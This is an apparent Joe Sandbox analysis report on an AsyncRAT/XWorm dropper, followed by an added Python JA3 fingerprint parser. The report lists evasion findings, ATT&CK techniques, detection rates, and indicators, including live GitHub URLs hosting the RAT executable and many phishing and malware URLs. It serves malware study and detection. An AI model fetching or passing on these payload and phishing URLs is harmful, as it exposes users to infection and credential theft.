            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.dr | Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Memory allocated: F40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Memory allocated: 1AAA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Window / User API: threadDelayed 6041
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Window / User API: threadDelayed 3952
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684 | Thread sleep count: 6041 > 30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684 | Thread sleep time: -60410000s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684 | Thread sleep count: 3952 > 30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684 | Thread sleep time: -39520000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe TID: 6232 | Thread sleep time: -35000s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | File Volume queried: C:\ FullSizeInformation
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
            Source: RuntimeBroker.exe, 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: QemU{
            Source: RuntimeBroker.exe, 00000003.00000002.4613101448.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Code function: 0_2_00007FF651793D04 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Code function: 0_2_00007FF651793EE8 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Code function: 0_2_00007FF651793860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: XWormUI[1].exe.0.dr, AntiProcess.cs | Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
            Source: XWormUI[1].exe.0.dr, Win32.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: XWormUI[1].exe.0.dr, Amsi.cs | Reference to suspicious API methods: Win32.VirtualAllocEx(procAddress, (UIntPtr)(ulong)patch.Length, 64u, out var _)
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Code function: 0_2_00007FF651793F5C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Code function: 0_2_00007FF6517913C0 GetUserNameW,memmove,memmove,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: Yara match | File source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.dr | Binary or memory string: MSASCui.exe
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.dr | Binary or memory string: procexp.exe
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.dr | Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the hit marker carried over from the report's matrix, techniques without one were not flagged for this sample)
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 1 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 1 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 1 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Disable or Modify Tools; 1 Process Injection; 111 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 1 System Time Discovery; 1 Query Registry; 321 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 14 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

            Antivirus detection, submitted sample (Source | Detection | Scanner | Label)
            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | 45% | ReversingLabs | Win64.Backdoor.Asyncrat
            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | 59% | Virustotal | (see vendor report)
            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | 100% | Avira | BDS/Redcap.slbem
            Antivirus detection, dropped files (Source | Detection | Scanner | Label)
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | 100% | Avira | HEUR/AGEN.1305769
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1305769
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | 96% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | 72% | Virustotal | (see vendor report)
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 96% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 72% | Virustotal | (see vendor report)
            Antivirus detection, unpacked PE files: No Antivirus matches
            Antivirus detection, domains (Source | Detection | Scanner)
            github.com | 0% | Virustotal
            raw.githubusercontent.com | 0% | Virustotal
            Antivirus detection, URLs (Source | Detection | Scanner | Label)
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            https://raw.githubusercontent.com/a | 1% | Virustotal
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exeProgramDownloade | 1% | Virustotal
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe | 3% | Virustotal
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe | 4% | Virustotal
            https://raw.githubusercontent.com/ | 1% | Virustotal
            Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
            github.com | 140.82.121.3 | true | false | none | unknown
            raw.githubusercontent.com | 185.199.111.133 | true | false | none | unknown
            Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe | false | none | unknown
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe | false | none | unknown
            URLs from memory and binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
            https://raw.githubusercontent.com/e.b | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeWYL | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeA4z | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A8F000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe0 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://github.com/3;C | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exer | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exemYj | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exetXa | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/a | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RuntimeBroker.exe, 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exeProgramDownloade | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | false | none | unknown
            https://github.com/D; | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            https://raw.githubusercontent.com/ | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
            Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
            37.18.62.18 | unknown | Netherlands | 203714 | FLEXLTD-ASRU | true
            140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
            185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
                               Joe Sandbox version: 41.0.0 Charoite
                               Analysis ID: 1522429
                               Start date and time: 2024-09-30 03:23:10 +02:00
                               Joe Sandbox product: CloudBasic
                               Overall analysis duration: 0h 6m 42s
                               Hypervisor based Inspection enabled: false
                               Report type: full
                               Cookbook file name: default.jbs
                               Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                               Number of analysed new started processes: 6
                               Number of new started drivers analysed: 0
                               Number of existing processes analysed: 0
                               Number of existing drivers analysed: 0
                               Number of injected processes analysed: 0
                               Technologies:
                               • HCA enabled
                               • EGA enabled
                               • AMSI enabled
                               Analysis Mode: default
                               Analysis stop reason: Timeout
                               Sample name: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                               Detection: MAL
                               Classification: mal100.troj.evad.winEXE@3/2@2/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 16
                              • Number of non-executed functions: 9
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                               Time | Type | Description
                               21:24:09 | API Interceptor | 5280791x Sleep call for process: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe modified
                               IPs seen in other analyses (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
                               140.82.121.3:
                               6glRBXzk6i.exe | malicious | RedLine | github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                               firefox.lnk | malicious | CobaltStrike | github.com/john-xor/temp/blob/main/index.html?raw=true
                               0XzeMRyE1e.exe | malicious | Amadey, Vidar | github.com/neiqops/ajajaj/raw/main/file_22613.exe
                               MzRn1YNrbz.exe | malicious | Vidar | github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                               RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
                               185.199.111.133:
                               https://rajkamalkanna.github.io/Facebook-Login-Page/ | malicious | HTMLPhisher
                               https://vinitk1509.github.io/NETFLIX | malicious | HTMLPhisher
                               SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos
                               dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos
                               https://metmaskiloi.gitbook.io/us/ | malicious | HTMLPhisher
                               http://sis030.github.io/1_Netflix_Deepdive/ | malicious | HTMLPhisher
                               https://telagremn.com/ | malicious | Unknown
                               http://tokenpuzz1le.com/ | malicious | HTMLPhisher
                               https://tokenp0kczt.net/ | malicious | HTMLPhisher
                               http://tokenpblket.com/ | malicious | HTMLPhisher
                               Domains seen in other analyses (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
                               raw.githubusercontent.com:
                               C6DAEyTs7d.rtf | malicious | Remcos | 185.199.109.133
                               SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 185.199.111.133
                               dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 185.199.111.133
                               4xBq1SMyQt.exe | malicious | XWorm | 185.199.110.133
                               http://gasbot-demos.vercel.app/ | malicious | Unknown | 185.199.109.133
                               https://33357.github.io/uniswap-v2 | malicious | Unknown | 185.199.108.133
                               https://coinbase-auth.netlify.app/ | malicious | HTMLPhisher | 185.199.110.133
                               PO.xls | malicious | Remcos | 185.199.108.133
                               SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | 185.199.110.133
                               http://tokenpuzz1le.com/ | malicious | HTMLPhisher | 185.199.111.133
                               github.com:
                               http://metauscvxlkogimens.gitbook.io/ | malicious | HTMLPhisher | 140.82.121.3
                               https://krakenqplogin.gitbook.io/us/ | malicious | HTMLPhisher | 140.82.121.3
                               https://metamasunklogin.gitbook.io/ | malicious | HTMLPhisher | 140.82.121.3
                               https://metmaskiloi.gitbook.io/us/ | malicious | HTMLPhisher | 140.82.121.4
                               file.exe | malicious | Amadey, BitCoin Miner, SilentXMRMiner | 140.82.121.3
                               PO#518464.js | malicious | STRRAT | 140.82.121.4
                               ASNs seen in other analyses (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
                               FLEXLTD-ASRU:
                               4YfxTm3isi.elf | malicious | Mirai | 45.134.61.237
                               botx.x86.elf | malicious | Unknown | 45.134.61.231
                               MV GEOSAND_FINAL DRAFT MR_pdf.exe | malicious | Lokibot | 193.42.113.74
                               ZS7QSsD4yz.exe | malicious | Lokibot | 193.42.113.74
                               shipping docsETDBL8091.xlsx | malicious | Lokibot | 193.42.113.74
                               Arrival Notice.xlsx | malicious | Lokibot | 193.42.113.74
                               8tKNSp1IgM.exe | malicious | Vidar | 193.42.113.197
                               FASTLYUS:
                               https://polap77.com/ | malicious | HTMLPhisher | 151.101.194.137
                               https://www.marketbeat.com/articles/music-streaming-site-spotify-temporarily-goes-down-2024-09-29/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletterclick&source=ARNDaily&AccountID=13091940&hash=99E2922EEB6FEC86743F5DB2C0E84BA5899D68F68F1472F885291F590EAD713452D3376C362A15DEDE29DFC4761637FD6FDD698F31176C60366847F610D6C32C | malicious | Unknown | 151.101.129.44
                               https://ebookkeepers.com.pk/ | malicious | Unknown | 151.101.2.133
                               https://mx1.margarettaphilomena.net/ | malicious | Unknown | 199.232.188.157
                               https://jenifer-lopezz.pages.dev/ | malicious | Unknown | 185.199.108.153
                               https://kaisonfhtr.pages.dev/ | malicious | Anonymous Proxy | 151.101.192.84
                               https://jogosderobloxdematazumbie.blogspot.com/ | malicious | Unknown | 151.101.1.140
                               https://www.givingday.communityschoolnaples.org/ | malicious | Unknown | 151.101.64.176
                               http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/ | malicious | Unknown | 151.101.1.140
                               http://www.safari.com/ | malicious | Unknown | 151.101.1.63
                               GITHUBUS:
                               https://rajkamalkanna.github.io/Facebook-Login-Page/ | malicious | HTMLPhisher | 140.82.113.21
                               http://metauscvxlkogimens.gitbook.io/ | malicious | HTMLPhisher | 140.82.121.3
                               https://krakenqplogin.gitbook.io/us/ | malicious | HTMLPhisher | 140.82.121.3
                               https://metamasunklogin.gitbook.io/ | malicious | HTMLPhisher | 140.82.121.3
                               https://vinitk1509.github.io/NETFLIX | malicious | HTMLPhisher | 140.82.121.5
                               https://trezor-docs-info.github.io/ | malicious | HTMLPhisher | 140.82.121.3
                               https://metmaskiloi.gitbook.io/us/ | malicious | HTMLPhisher | 140.82.121.4
                               http://sis030.github.io/1_Netflix_Deepdive/ | malicious | HTMLPhisher | 140.82.113.18
                               file.exe | malicious | Amadey, BitCoin Miner, SilentXMRMiner | 140.82.121.3
                               https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exe | malicious | Unknown | 140.82.121.4
                               JA3 fingerprints seen in other analyses (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
                               37f463bf4616ecd445d4a1937da06e19:
                               SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exe | malicious | GhostRat, Mimikatz, Nitol | 140.82.121.3, 185.199.111.133
                               file.exe | malicious | Clipboard Hijacker, Vidar | 140.82.121.3, 185.199.111.133
                               file.exe | malicious | LummaC, Vidar | 140.82.121.3, 185.199.111.133
                               file.exe | malicious | LummaC, Vidar | 140.82.121.3, 185.199.111.133
                               SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | malicious | Unknown | 140.82.121.3, 185.199.111.133
                               SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | malicious | Unknown | 140.82.121.3, 185.199.111.133
                               app__v7.1.7_.msi | malicious | Unknown | 140.82.121.3, 185.199.111.133
                               file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 140.82.121.3, 185.199.111.133
                               file.exe | malicious | CredGrabber, Meduza Stealer | 140.82.121.3, 185.199.111.133
                               file.exe | malicious | LummaC, Vidar | 140.82.121.3, 185.199.111.133
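                               The table above correlates this sample with earlier analyses on a JA3 value, so it helps to know exactly what that value is computed from: the MD5 of a comma-separated string built from the ClientHello's version, cipher suites, extension types, supported groups and EC point formats, with GREASE values dropped. The parser below is an added example written for this page, not Joe Sandbox code, and it runs on a ClientHello constructed inline for illustration; the report's own fingerprint cannot be reproduced here because the captured ClientHello is not part of the page.

```python
"""Compute a JA3 client fingerprint from a raw TLS ClientHello record (added example)."""
from __future__ import annotations

import hashlib
import struct

# GREASE values (RFC 8701) are excluded from JA3: 0x0a0a, 0x1a1a, ..., 0xfafa.
GREASE = {(v << 8) | v for v in range(0x0A, 0x100, 0x10)}


def _u16(buf: bytes, offset: int) -> int:
    return struct.unpack_from("!H", buf, offset)[0]


def ja3_from_client_hello(record: bytes) -> tuple[str, str]:
    """Return (ja3_string, ja3_md5) for a TLS record that carries a ClientHello."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    handshake = record[5:5 + _u16(record, 3)]
    if handshake[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = handshake[4:4 + int.from_bytes(handshake[1:4], "big")]

    pos = 0
    version = _u16(body, pos); pos += 2          # JA3 uses the handshake version, not the record version
    pos += 32                                    # client random
    pos += 1 + body[pos]                         # session id
    cs_len = _u16(body, pos); pos += 2
    ciphers = [_u16(body, pos + i) for i in range(0, cs_len, 2)]; pos += cs_len
    pos += 1 + body[pos]                         # compression methods

    extensions: list[int] = []
    curves: list[int] = []
    point_formats: list[int] = []
    if pos + 2 <= len(body):
        end = pos + 2 + _u16(body, pos); pos += 2
        while pos + 4 <= end:
            ext_type, ext_len = _u16(body, pos), _u16(body, pos + 2); pos += 4
            data = body[pos:pos + ext_len]; pos += ext_len
            extensions.append(ext_type)
            if ext_type == 10:                   # supported_groups: 2-byte list length, 2-byte entries
                curves = [_u16(data, 2 + i) for i in range(0, _u16(data, 0), 2)]
            elif ext_type == 11:                 # ec_point_formats: 1-byte list length, 1-byte entries
                point_formats = list(data[1:1 + data[0]])

    def field(values: list[int]) -> str:
        return "-".join(str(v) for v in values if v not in GREASE)

    ja3 = ",".join([str(version), field(ciphers), field(extensions), field(curves), field(point_formats)])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(version: int, ciphers: list[int], extensions: list[tuple[int, bytes]]) -> bytes:
    """Assemble a minimal ClientHello record for testing; extensions are (type, data) in wire order."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"          # version, zero random, empty session id
    cipher_bytes = b"".join(struct.pack("!H", c) for c in ciphers)
    body += struct.pack("!H", len(cipher_bytes)) + cipher_bytes
    body += b"\x01\x00"                                              # one compression method: null
    ext_bytes = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext_bytes)) + ext_bytes
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def supported_groups_ext(groups: list[int]) -> tuple[int, bytes]:
    data = b"".join(struct.pack("!H", g) for g in groups)
    return 10, struct.pack("!H", len(data)) + data


def ec_point_formats_ext(formats: list[int]) -> tuple[int, bytes]:
    return 11, bytes([len(formats)]) + bytes(formats)


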